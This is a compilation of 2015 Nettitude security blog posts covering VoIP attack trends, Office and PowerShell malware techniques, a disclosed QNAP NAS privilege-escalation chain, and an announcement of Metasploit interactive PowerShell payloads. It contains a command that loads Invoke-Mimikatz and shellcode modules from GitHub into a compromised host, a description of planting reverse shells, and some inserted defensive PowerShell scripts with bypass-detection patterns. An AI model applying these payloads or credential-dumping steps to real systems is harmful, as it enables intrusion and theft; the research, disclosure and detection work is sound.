VoIP attacks are on the rise, particularly in the UK, according to new research by Nettitude

Voice over IP (VoIP) infrastructure has become more susceptible to cyber attacks in recent years due to the proliferation of both its use and the tools that can be used for malicious purposes. During the first quarter of 2015, our security researchers observed a large number of VoIP attacks worldwide; however, the majority were against UK servers.

Our researchers found that VoIP attacks often started just a few minutes after a new server went live. Worryingly, they also identified that 88 percent of VoIP attacks took place outside of regular working hours, when there would typically be no security staff present to monitor the situation.

Nettitude has released the findings of this research in full, detailing the key findings and explaining the tools and techniques that are being used by today’s VoIP attackers.

To download a copy of the report, please click here.

To contact Nettitude editor, please email media@nettitude.com.

Malware Is Changing Daily! Are You Still Protected?

A look at recent malware techniques

One of the biggest challenges in detecting and protecting against malware is that attackers continually change their techniques and behaviours. We have observed some interesting activities recently that are worth discussing in more detail.

Office macro security bypass 

Traditionally, malware embedded in a Microsoft Office document requires the user to enable macros. If a user inadvertently opens a malicious document, the warning prompt to enable macros is a red flag that should lead them to close the document immediately. However, recently analysed malware embedded within Microsoft Office documents has adapted its technique.

Once the document is open, the user is presented with a blank page asking them to click on the button to download the content of the page. Once the user clicks on the button, they are then presented with another message box asking them to open the document which will then run the macro.

Figure 1 - Malware bypassing macro activation

Closer inspection of the “Display the content of the document” button reveals that the author has embedded an object that can be accessed without macros being enabled. In this case, the object was a Visual Basic (VBS) script.

Analysis of this script revealed some interesting tricks used to bypass the default Windows security settings within PowerShell. The script uses a PowerShell ExecutionPolicy bypass, which is explained in the next section.

Figure 2 - Office document with a VBS script as embedded object - the user does not need to enable macros

PowerShell ExecutionPolicy bypass – no profile

Few end users know about PowerShell: unless you are involved in system administration, scripting or hacking/penetration testing, you are unlikely to be aware of it. PowerShell is nevertheless installed by default in all recent versions of Microsoft Windows.

Windows PowerShell extends the command line in new and exciting ways. It opens access to some of the operating system functions in ways that were previously possible only with extensive programming. For example, you can not only get the name of a particular user, but also retrieve the entire related user object. You can then manipulate the properties of this user object by referring to the properties you want to work with by name.

Windows PowerShell also has a non-interactive processing mode, which is used when executing a series of commands. In non-interactive mode, PowerShell reads and executes commands one by one but does not present a prompt to the user. This is what the malware makes use of in this case: using non-interactive mode, the commands are executed without the user’s knowledge. In this scenario, the malware is also bypassing the execution policy.

The execution policy is part of the security strategy of Windows PowerShell. It determines whether you can load configuration files (including your Windows PowerShell profile) and run scripts, and which scripts, if any, must be digitally signed before they will run. However, with the “-Bypass” policy, nothing is blocked and there are no warnings or prompts. This feature was never intended to block malware, sadly.

An effective way to reduce the risk of being compromised by malware such as this is to whitelist the applications that are allowed to run on a computer system. It is true, however, that the malicious user could have achieved their objective by other methods. The targeted system is therefore better protected if the user does not download from untrusted sources or open unknown or unexpected documents from a sender who cannot be verified.
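As an added example (not code from the Nettitude post), the following PowerShell audits the two things a defender can act on after the above: it reports the effective execution policy per scope (which a “-Bypass” launch simply ignores), checks whether script block logging is enabled, and searches Security event 4688 for PowerShell launches that used the -Bypass or -NoProfile switches. It assumes PowerShell 5 or later, an elevated session, and that process creation auditing with command-line logging is turned on; the function names are my own.

```powershell
# Added example: execution-policy and launch audit (not from the original post).
# Assumes PowerShell 5+, an elevated session and command-line auditing for event 4688.

function Get-ExecutionPolicyState {
    # The policy is per scope and purely advisory: "powershell -ExecutionPolicy Bypass"
    # ignores all of it, so no value below blocks malware. It is still worth knowing.
    $policies = Get-ExecutionPolicy -List | Select-Object Scope, ExecutionPolicy

    # Script block logging (event 4104 in Microsoft-Windows-PowerShell/Operational)
    # records what actually ran, including code started with -Bypass or -NoProfile.
    $sblKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    $sblOn  = $false
    if (Test-Path $sblKey) {
        $value = Get-ItemProperty -Path $sblKey -Name EnableScriptBlockLogging -ErrorAction SilentlyContinue
        $sblOn = ($value.EnableScriptBlockLogging -eq 1)
    }

    [pscustomobject]@{
        Policies           = $policies
        ScriptBlockLogging = $sblOn
        # Application whitelisting (the post's recommendation) is what stops an unknown
        # script or binary from running; the policy and the logging only help you notice.
        Note               = 'ExecutionPolicy is not a security boundary; rely on whitelisting and logging'
    }
}

function Find-BypassLaunch {
    # Looks back over Security event 4688 (process creation) for PowerShell started with
    # the switches this malware relies on: -ExecutionPolicy Bypass (-ep bypass), -NoProfile (-nop).
    param([int]$Hours = 24)
    $filter  = @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-$Hours) }
    $pattern = '(?i)-(executionpolicy\s+bypass|ep\s+bypass|noprofile|nop\b)'

    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match '(?i)powershell' -and $_.Message -match $pattern } |
        ForEach-Object {
            # The command line sits on its own "Process Command Line:" line of the message.
            $cmd = ($_.Message -split '\r?\n' | Where-Object { $_ -match 'Process Command Line' }) -join ''
            [pscustomobject]@{ Time = $_.TimeCreated; CommandLine = $cmd.Trim() }
        }
}

Get-ExecutionPolicyState | Format-List
Find-BypassLaunch -Hours 24 | Format-Table -AutoSize
```

Without command-line auditing, event 4688 carries only the process name and Find-BypassLaunch returns nothing, so enable that audit setting first.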

The figure below shows the VB script that was downloaded from the Office document. As indicated in the image, line 2 contains the instruction that executes the malicious command. Line 2 was disabled and line 3 was created to display the malicious command instead.

Figure 3 - Malware exploiting Microsoft PowerShell

Malware using a known port to hide its traffic: really?

Protecting against malware that uses port 80 is generally difficult. However, it is possible to control which applications run on a given port number. For instance, we have a sample of the Dridex malware running on port 8443.

Even though port 8443 is an official alternative to port 443, it is easy to narrow down which applications use that port. The ‘netstat’ command, when executed as a privileged user, reveals whether the port is open and which applications (by process ID) are currently connected to it.

Figure 4 - Quick command to determine which port is open and list connected applications

The example below shows the Dridex malware configured to use port 8443.

Figure 5 - Extract from Dridex malware sample showing port 8443

Whitelisting the applications that are allowed to use certain ports could help in identifying malicious traffic.
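The netstat check above, extended into a repeatable allowlist test as an added PowerShell example (not from the Nettitude post): it maps every connection on a given port to the owning process and its executable and flags anything not on the list. It assumes Windows 8 / Server 2012 or later for Get-NetTCPConnection, an elevated prompt (as netstat also needs to show every owner), and the allowlist path is a placeholder.

```powershell
# Added example (not from the original post): which executables are using a port,
# compared against an allowlist. Assumes Windows 8 / Server 2012+ and an elevated session.

function Test-PortAllowlist {
    param(
        [Parameter(Mandatory)][int]$Port,
        # Placeholder allowlist: the only binaries expected to speak on this port.
        [string[]]$AllowedPaths = @('C:\Program Files\Example\proxy.exe')
    )
    # Both directions matter: malware such as the sample above connects *out* to 8443,
    # while a legitimate service would normally *listen* on it.
    $conns = Get-NetTCPConnection -ErrorAction SilentlyContinue |
        Where-Object { $_.LocalPort -eq $Port -or $_.RemotePort -eq $Port }

    foreach ($c in $conns) {
        # Resolve the owning PID to an executable path via WMI/CIM.
        $proc = Get-CimInstance Win32_Process -Filter "ProcessId = $($c.OwningProcess)"
        $path = if ($proc -and $proc.ExecutablePath) { $proc.ExecutablePath } else { '<exited or access denied>' }

        [pscustomobject]@{
            Direction     = if ($c.RemotePort -eq $Port) { 'Outbound' } else { 'Listening/Inbound' }
            State         = $c.State
            LocalAddress  = "$($c.LocalAddress):$($c.LocalPort)"
            RemoteAddress = "$($c.RemoteAddress):$($c.RemotePort)"
            Pid           = $c.OwningProcess
            Path          = $path
            Allowed       = ($AllowedPaths -contains $path)
        }
    }
}

# Anything with Allowed = False on 8443 deserves a look; this is the check the post
# performs by hand with netstat, with the process name resolved for you.
Test-PortAllowlist -Port 8443 | Where-Object { -not $_.Allowed } | Format-Table -AutoSize
```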

Fake voicemail: double extension

On a different note, another strain of malware has recently been observed using an old trick: it disguises itself as a voicemail. The trick used here is the double extension. The malware appears to be a .wav file but is in fact a .wav.exe.

Receiving a voicemail is very common, and curiosity makes it easy to think “what’s the worst that can happen if I listen to this message?”.

Figure 6 - Malware sample using double extension - fake voicemail

As seen in the image above, the file looks like a voicemail (audio file), but it is not. As the red box shows, the purported voicemail is in fact an application. The golden rule remains valid: do not trust unknown attachments or links. If you do not expect an attachment, contact the sender where appropriate. If it is obviously malware, delete the fake voicemail; if in any doubt, delete the file. As the saying goes, if it is important, they will call back.

The same technique could be used to target WhatsApp, Viber, Skype or any other social messenger that allows voice communication. For instance, people can be targeted with an email suggesting that they have received a voicemail from a friend on WhatsApp, Viber or Skype, to name a few. Fake voicemail is an especially effective lure during big events such as elections (just around the corner in the UK at the time of writing!), when users can be tricked into listening to a supposed recording of politicians’ secret conversations.

It is not, however, uncommon for telephone services, especially voice over IP services, to offer voicemail by email. Before trying to listen to a message that may not in fact exist, it is very important to verify the origin of the voicemail.
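A defender-side check for the double-extension lure above, added here as an example (not from the Nettitude post): it scans a folder of saved attachments and flags names like voicemail.wav.exe, and also files with an audio extension whose first bytes are a Windows executable header, since Explorer hides known extensions. The folder path and the extension lists are assumptions for the example.

```powershell
# Added example (not from the original post): find attachments posing as audio files.
# The extension lists and scan path are assumptions; adjust them to your environment.

function Find-FakeVoicemail {
    param(
        [Parameter(Mandatory)][string]$Path,
        [string[]]$MediaExt = @('.wav', '.mp3', '.m4a', '.ogg', '.wma'),
        [string[]]$ExecExt  = @('.exe', '.scr', '.com', '.pif', '.bat', '.cmd', '.js', '.vbs')
    )
    Get-ChildItem -Path $Path -File -Recurse | ForEach-Object {
        $parts   = $_.Name.ToLowerInvariant().Split('.')
        $reasons = @()

        # 1. Double extension: the second-to-last extension is audio, the last is executable
        #    (voicemail.wav.exe). Explorer with "hide known extensions" shows "voicemail.wav".
        if ($parts.Count -ge 3 -and
            $MediaExt -contains ".$($parts[-2])" -and
            $ExecExt  -contains ".$($parts[-1])") {
            $reasons += 'double extension'
        }

        # 2. Content check: a Windows executable starts with "MZ" regardless of its name,
        #    so an "audio" file with that header is not audio.
        $magic = ''
        try {
            $head = New-Object byte[] 2
            $fs   = [System.IO.File]::OpenRead($_.FullName)
            try { $read = $fs.Read($head, 0, 2) } finally { $fs.Dispose() }
            $magic = [System.Text.Encoding]::ASCII.GetString($head, 0, $read)
        } catch { $magic = '' }   # unreadable file: skip the content check
        if ($MediaExt -contains $_.Extension.ToLowerInvariant() -and $magic -eq 'MZ') {
            $reasons += 'audio extension but executable (MZ) header'
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{ File = $_.FullName; Length = $_.Length; Reason = ($reasons -join '; ') }
        }
    }
}

Find-FakeVoicemail -Path "$env:USERPROFILE\Downloads" | Format-Table -AutoSize
```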

Conclusion

Malware is continually evolving, and effective 24/7 monitoring is key to protecting against it. This can be achieved with our Threat2Alert service (https://www.threat2alert.com/). Nettitude can also provide expert research and deep-dive investigations into malicious activity within your organisation.

It is also important to have an incident response procedure in place. Effective security needs to be reviewed and updated based on the threat information available. Knowledge of current threats, malware behaviours and techniques will help determine the best security strategy to implement.

Loading A Weaponised Interactive PowerShell Session With Metasploit

PowerShell is rapidly becoming the go-to post-exploitation method for hackers, with a plethora of awesome PowerShell tools such as PowerSploit, PowerUp, PowerView and Nishang, to name a few. The standard PowerShell environment can quickly be extended into a hacker’s delight.

These ‘tools’ are written entirely in PowerShell and (largely) do not touch disk; they are therefore anti-virus (AV) friendly and do not involve risky process injection. However, it has not all been plain sailing: achieving a remote interactive PowerShell session (without the use of PSRemoting or WinRM) has often been an inconvenience. As security professionals, here at Nettitude we are keen to solve this issue. At present, Metasploit offers some PowerShell post modules to execute scripts or standalone tools, but there is nothing like having an interactive shell.

Enter the new Interactive PowerShell payloads for Metasploit written by Nettitude consultants, Ben Turner (@benpturner) and Dave Hardy (@davehardy20).

These payloads offer the ability to have an interactive PowerShell session on an already compromised host, via the windows/local/payload_inject module (see Figure 1).

Figure 1 - Reverse session using new Interactive PowerShell payload

Alternatively, you can use the new payloads as a replacement for the normal Metasploit payloads, such as windows/meterpreter/reverse_tcp when using PSEXEC for example (See Figure 2).

Figure 2 - Executing powershell_bind_tcp through PSEXEC.

The payloads provide not just an interactive PowerShell session, but can be remotely ‘weaponised’ with the modules of your choosing (e.g. PowerSploit, PowerTools). Just set the LOAD_MODULES option within the payload to a comma-separated string of web server or local network locations where the modules are hosted, which is handy if you don’t have Internet access.

For example, if you are lucky enough to have Internet access from your target, you can use the GitHub repositories directly like so:

set LOAD_MODULES https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1,https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1,………..

Figure 3 - Fully weaponised PowerShell session

As you can see in Figure 3, we now have an interactive PowerShell session in Metasploit and the console reports that it has loaded ten modules.

In total, there are actually four new Interactive PowerShell payloads, two that work for the processes above and two more that will work with msfvenom, or the generate option within msfconsole, which create standalone bind and reverse payloads that can be uploaded and executed separately (see Figure 4).

Figure 4 - Generating a powershell_reverse_tcp payload

But we know the burning question is… ‘does mimikatz work this way?’ Well, yes it does. As with all things mimikatz, you need to get hold of SYSTEM privileges somehow (but it’s Windows, so no dramas there). Then run the excellent PowerSploit ‘Invoke-Mimikatz’ cmdlet in your newly weaponised PowerShell session and BOOM! (Kudos to @JosephBialek, @gentilkiwi and @mattifestation for making this module a reality!)

Figure 5 - Mimikatz over PowerShell interactive Metasploit session

The rest really is up to you!

“So where do I get this awesomeness?”
The PowerShell payloads are in the main Metasploit tree, so all you need to do is get the latest and greatest Metasploit Framework git version including commit – https://github.com/rapid7/metasploit-framework/pull/5194

Or if you are looking for the standalone scripts they are available here – https://github.com/nettitude/powershell

Happy hunting.

Background

Looking for something a bit more local or don’t have Metasploit? Read on!

As an extra to the Metasploit payloads, and to give some background to the work behind the module, we are publishing the initial scripts that were developed to ‘weaponise’ a standard Windows PowerShell session. These PowerShell scripts were first used as a proof of concept and as early Metasploit modules.

These are essentially just loops that read the remote GitHub repository of PowerSploit, PowerView and PowerUp and use the PowerShell ‘download cradle’ method or ‘local’ web server version to retrieve the PowerShell modules (useful when there is no Internet access).

The scripts are as follows:

  • In-memory-downloader.ps1 – downloads the modules and installs them into memory; no AV stress
  • Local-in-memory-downloader.ps1 – the local network version of the above, although this requires a local web server
  • Powersploit-downloader.ps1 – this script and the corresponding Powertools-downloader.ps1 download the modules to disk and install them. These are for systems with no anti-virus (or whose anti-virus does not detect the modules). Another reason for this method is that some of these tools will not run fully in memory alone.

The scripts themselves are easy to use: just copy and paste the download cradle command into an active PowerShell session (see Figure 6) on which the ‘in-memory-downloader.ps1’ script has been run.

Figure 6 - Executing in-memory-downloader.ps1

Future Development

We will look to include SSL support for the payloads and hopefully create additional post modules that work with the new Metasploit PowerShell session. We have not developed any yet, as the integration of these modules relied on the new session type being integrated into Metasploit. Now that this has been completed and approved in the core Metasploit framework, we can start developing them.

QNAP NAS – Remote Unauthenticated User to Admin Shell: Part 2

tl;dr

A number of security vulnerabilities have been identified in two applications hosted on the QNAP App Center. When combined it is possible for a remote unauthenticated user to gain interactive remote administrative access and take full control of the device.

Introduction

In the previous blog post, it was shown that the Logitech Media Server (7.7.2) App suffers from Shellshock. The situation is further aggravated by the developer’s decision not to implement the chroot configuration option. However, the account that the application runs under, and thus the account under which the Bash commands are executed, does not have root/administrative permissions.

The ultimate objective of exploit development is to gain a root/administrative remote shell, leaving no room for debate about the seriousness of the issue: the system has been completely exploited and is under the full control of the attacker. End of story, no debate. With this in mind, I began to examine the system to identify a means to execute a reverse shell and gain privileged credentials.

Vulnerability 1 – Weak Folder Permissions iStat 0.5.7

The iStat application is used to monitor system resource utilisation. The user is free to decide what is monitored and to what level. The data is displayed via a web interface that is hosted on the device’s main web server. It is accessed via http://<ip_address>/istat/login.php.

A traditional or bind shell instructs a machine to open a command shell, present it on a port and wait for inbound connections, thus granting a user (or, for that matter, an attacker) interactive access. However, with the widespread adoption of firewalls their effectiveness has become somewhat limited, as inbound connections are tightly controlled. A reverse shell, in contrast, actively connects back to a machine rather than waiting for an incoming connection. As firewalls are typically much more permissive of outbound connections, reverse shells have become dominant.

A bind or reverse shell can be written in pretty much any language. If it is coded in a language that can be executed by a web server (e.g. ASP, ASP.NET, PHP) and provided that an attacker can write to a suitable location, the shell will be spawned and access granted. By recursively searching the file system we can see that iStat has weak folder permissions: everyone, including the ssods/Logitech Media Server account, has read/write/execute access (see Figure 1).

Figure 1 – Everyone RWX directory served by Apache

This folder is served by the application’s web server, which will therefore execute a suitably coded reverse shell placed in it.

Vulnerability 2 – Web Server Runs With Administrative Permissions

iStat is hosted on an Apache instance. It runs under an account called httpdusr, which is a member of the Administrators group. Thus, when a reverse shell is executed, it grants the attacker administrative access to the device (see Figure 2).

Summary

iStat 0.5.7, hosted on the QNAP App Center, suffers from several security issues. On their own they do not grant remote unauthenticated access. However, once an attacker gains limited access, they can be leveraged to obtain administrative privileges. The sixteen thousand customers who have downloaded it should uninstall it immediately.

In conclusion, this two-part blog illustrates a pattern we see in many contemporary attacks: multiple vulnerabilities, mistakes and weaknesses chained together to achieve full exploitation (see Figure 3). If any one of them is missing, the attacker fails to get administrative access. If the chain can be formed, it’s game over and the attacker wins.

Figure 3 - kill chain

The release of this information has followed the responsible disclosure model. All research has been forwarded to QNAP and the date of disclosure mutually agreed. CERT has been informed and is tracking this issue.

Timeline

  • Logitech Media Server Shellshock vulnerability discovered on 08/02/2015
  • QNAP informed via website on 11/02/2015
  • SSOTS/SSODS author contacted 12/02/2015. No response to date
  • Reported to cert.org on 12/02/2015
  • Confirmed against latest firmware and ARM plus x86 devices on 16/02/2015
  • Local privilege elevation discovery on 22/02/2015
  • QNAP contacted via facebook.com on 05/03/2015
  • Proof of concept completed on 06/03/2015
  • Contacted by QNAP Security. Research forwarded and disclosure date agreed on 07/03/2015
  • Vulnerability disclosed on 06/04/2015
